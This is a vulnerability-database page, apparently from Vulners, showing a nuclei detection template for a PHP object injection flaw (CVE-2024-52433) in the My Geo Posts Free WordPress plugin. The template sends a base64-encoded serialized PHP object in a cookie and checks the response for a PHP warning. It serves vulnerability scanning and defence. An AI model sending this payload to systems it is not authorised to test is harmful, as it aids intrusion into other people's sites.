Lucene search

K

My Geo Posts Free <= 1.2 - PHP Object Injection

🗓️ 28 Nov 2024 01:12:25Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

My Geo Posts Free versions up to 1.2 vulnerable to PHP Object Injection allowing code execution.

Show more
Related
Refs
Code
id: CVE-2024-52433

info:
  name: My Geo Posts Free <= 1.2 - PHP Object Injection
  author: s4e-io
  severity: critical
  description: |
    The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-52433
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-geo-posts-free/my-geo-posts-free-12-unauthenticated-php-object-injection
    - https://patchstack.com/database/vulnerability/my-geo-posts-free/wordpress-my-geo-posts-free-plugin-1-2-php-object-injection-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-52433
    cwe-id: CWE-502
    epss-score: 0.00071
    epss-percentile: 0.32461
    cpe: cpe:2.3:a:mindstien:my_geo_posts_free:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mindstien
    product: my_geo_posts_free
    framework: wordpress
  tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection

variables:
  string: '{{rand_text_alpha(5)}}'
  payload: 'O":20:"{{string}}":0:{}'
  encrypt: '{{base64(payload)}}'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: mgpf_geo_coockie={{encrypt}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Warning", "mgpf_get_geo_location()", "{{encrypt}}")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ab4cd14531554a30b8bb841e11c379ab0a1183d4278bded34298ceb903b2bdd4022100943dd81f27bb75cd96ade9516ca4b02c52df70616eb7be32b5604a88cc9f7c39:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Nov 2024 01:25Current
7.3High risk
Vulners AI Score7.3
CVSS39.8
SSVC
7
.json
Report